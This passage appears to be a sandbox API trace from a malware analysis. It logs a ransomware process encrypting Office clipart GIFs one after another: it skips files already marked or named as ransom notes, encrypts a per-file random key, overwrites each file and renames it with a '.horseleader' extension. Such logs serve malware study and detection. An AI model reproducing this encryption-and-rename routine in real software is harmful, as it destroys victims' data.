lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2e73, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2e73, lpOverlapped=0x0) returned 1 [0252.387] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.387] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.400] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.400] CloseHandle (hObject=0x158) returned 1 [0252.400] GetProcessHeap () returned 0x780000 [0252.400] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.400] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF.horseleader") returned 79 [0252.400] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif.horseleader")) returned 1 [0252.401] GetProcessHeap () returned 0x780000 [0252.401] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.402] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29618e00, ftCreationTime.dwHighDateTime=0x1bd50af, 
ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x29618e00, ftLastWriteTime.dwHighDateTime=0x1bd50af, nFileSizeHigh=0x0, nFileSizeLow=0x205, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00090_.GIF", cAlternateFileName="")) returned 1 [0252.402] lstrcmpiW (lpString1="AG00090_.GIF", lpString2="Windows") returned -1 [0252.402] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 67 [0252.402] StrStrIW (lpFirst="AG00090_.GIF", lpSrch=".horseleader") returned 0x0 [0252.402] lstrcmpW (lpString1="AG00090_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.402] lstrcmpW (lpString1="AG00090_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.402] lstrlenW (lpString=".testttjffg") returned 11 [0252.402] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.402] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.402] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.402] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.403] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 67 [0252.403] StrStrW (lpFirst="AG00090_.GIF", lpSrch=".txt") returned 0x0 [0252.403] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: 
lpFileSize=0x32aedd0*=517) returned 1 [0252.404] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x205, lpOverlapped=0x0) returned 1 [0252.405] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffdfb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.405] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x205, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x205, lpOverlapped=0x0) returned 1 [0252.406] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.406] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.406] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.406] CloseHandle (hObject=0x158) returned 1 [0252.406] GetProcessHeap () returned 0x780000 [0252.406] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.406] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF.horseleader") returned 79 [0252.407] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF.horseleader" (normalized: 
"c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif.horseleader")) returned 1 [0252.412] GetProcessHeap () returned 0x780000 [0252.412] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.412] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26ff3400, ftCreationTime.dwHighDateTime=0x1bd50af, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x26ff3400, ftLastWriteTime.dwHighDateTime=0x1bd50af, nFileSizeHigh=0x0, nFileSizeLow=0x1f6, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00092_.GIF", cAlternateFileName="")) returned 1 [0252.412] lstrcmpiW (lpString1="AG00092_.GIF", lpString2="Windows") returned -1 [0252.412] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 67 [0252.412] StrStrIW (lpFirst="AG00092_.GIF", lpSrch=".horseleader") returned 0x0 [0252.412] lstrcmpW (lpString1="AG00092_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.412] lstrcmpW (lpString1="AG00092_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.412] lstrlenW (lpString=".testttjffg") returned 11 [0252.412] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.412] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.412] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.412] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft 
office\\clipart\\pub60cor\\ag00092_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.413] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 67 [0252.413] StrStrW (lpFirst="AG00092_.GIF", lpSrch=".txt") returned 0x0 [0252.413] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=502) returned 1 [0252.413] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1f6, lpOverlapped=0x0) returned 1 [0252.415] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffe0a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.415] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1f6, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1f6, lpOverlapped=0x0) returned 1 [0252.415] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.415] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.415] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.415] CloseHandle (hObject=0x158) returned 1 [0252.416] GetProcessHeap () returned 0x780000 [0252.416] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.416] wnsprintfW (in: pszDest=0x7dc820, 
cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF.horseleader") returned 79 [0252.416] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif.horseleader")) returned 1 [0252.419] GetProcessHeap () returned 0x780000 [0252.419] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.419] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ef57700, ftCreationTime.dwHighDateTime=0x1bd4f8b, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4ef57700, ftLastWriteTime.dwHighDateTime=0x1bd4f8b, nFileSizeHigh=0x0, nFileSizeLow=0x319e, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00103_.GIF", cAlternateFileName="")) returned 1 [0252.419] lstrcmpiW (lpString1="AG00103_.GIF", lpString2="Windows") returned -1 [0252.419] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 67 [0252.419] StrStrIW (lpFirst="AG00103_.GIF", lpSrch=".horseleader") returned 0x0 [0252.419] lstrcmpW (lpString1="AG00103_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.419] lstrcmpW (lpString1="AG00103_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.419] lstrlenW (lpString=".testttjffg") returned 11 [0252.419] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.420] CryptGenRandom (in: 
hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.420] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.420] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.421] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 67 [0252.421] StrStrW (lpFirst="AG00103_.GIF", lpSrch=".txt") returned 0x0 [0252.421] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=12702) returned 1 [0252.421] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x319e, lpOverlapped=0x0) returned 1 [0252.424] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffce62, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.424] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x319e, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x319e, lpOverlapped=0x0) returned 1 [0252.424] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.424] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.424] WriteFile (in: 
hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.425] CloseHandle (hObject=0x158) returned 1 [0252.425] GetProcessHeap () returned 0x780000 [0252.425] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.425] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF.horseleader") returned 79 [0252.425] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif.horseleader")) returned 1 [0252.426] GetProcessHeap () returned 0x780000 [0252.426] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.426] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf316a100, ftCreationTime.dwHighDateTime=0x1bd4bcc, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf316a100, ftLastWriteTime.dwHighDateTime=0x1bd4bcc, nFileSizeHigh=0x0, nFileSizeLow=0xd9c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00120_.GIF", cAlternateFileName="")) returned 1 [0252.426] lstrcmpiW (lpString1="AG00120_.GIF", lpString2="Windows") returned -1 [0252.426] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 67 [0252.426] StrStrIW (lpFirst="AG00120_.GIF", 
lpSrch=".horseleader") returned 0x0 [0252.426] lstrcmpW (lpString1="AG00120_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.426] lstrcmpW (lpString1="AG00120_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.426] lstrlenW (lpString=".testttjffg") returned 11 [0252.426] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.426] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.427] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.427] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.427] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 67 [0252.427] StrStrW (lpFirst="AG00120_.GIF", lpSrch=".txt") returned 0x0 [0252.427] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3484) returned 1 [0252.427] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xd9c, lpOverlapped=0x0) returned 1 [0252.429] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff264, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.429] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xd9c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xd9c, 
lpOverlapped=0x0) returned 1 [0252.430] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.430] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.430] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.430] CloseHandle (hObject=0x158) returned 1 [0252.430] GetProcessHeap () returned 0x780000 [0252.430] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.430] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF.horseleader") returned 79 [0252.430] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif.horseleader")) returned 1 [0252.431] GetProcessHeap () returned 0x780000 [0252.431] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.431] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33bee00, ftCreationTime.dwHighDateTime=0x1bd50af, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x33bee00, ftLastWriteTime.dwHighDateTime=0x1bd50af, nFileSizeHigh=0x0, 
nFileSizeLow=0xc44, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00126_.GIF", cAlternateFileName="")) returned 1 [0252.431] lstrcmpiW (lpString1="AG00126_.GIF", lpString2="Windows") returned -1 [0252.432] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 67 [0252.432] StrStrIW (lpFirst="AG00126_.GIF", lpSrch=".horseleader") returned 0x0 [0252.432] lstrcmpW (lpString1="AG00126_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.432] lstrcmpW (lpString1="AG00126_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.432] lstrlenW (lpString=".testttjffg") returned 11 [0252.432] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.432] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.432] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.432] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.433] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 67 [0252.433] StrStrW (lpFirst="AG00126_.GIF", lpSrch=".txt") returned 0x0 [0252.433] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3140) returned 1 [0252.433] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, 
lpNumberOfBytesRead=0x32aedf4*=0xc44, lpOverlapped=0x0) returned 1 [0252.435] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff3bc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.435] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xc44, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xc44, lpOverlapped=0x0) returned 1 [0252.436] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.436] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.436] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.436] CloseHandle (hObject=0x158) returned 1 [0252.436] GetProcessHeap () returned 0x780000 [0252.436] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.436] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF.horseleader") returned 79 [0252.436] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif.horseleader")) returned 1 [0252.437] GetProcessHeap () returned 0x780000 [0252.437] HeapFree (in: hHeap=0x780000, dwFlags=0x0, 
lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.437] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd99400, ftCreationTime.dwHighDateTime=0x1bd50af, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd99400, ftLastWriteTime.dwHighDateTime=0x1bd50af, nFileSizeHigh=0x0, nFileSizeLow=0x30c2, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00129_.GIF", cAlternateFileName="")) returned 1 [0252.438] lstrcmpiW (lpString1="AG00129_.GIF", lpString2="Windows") returned -1 [0252.438] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 67 [0252.438] StrStrIW 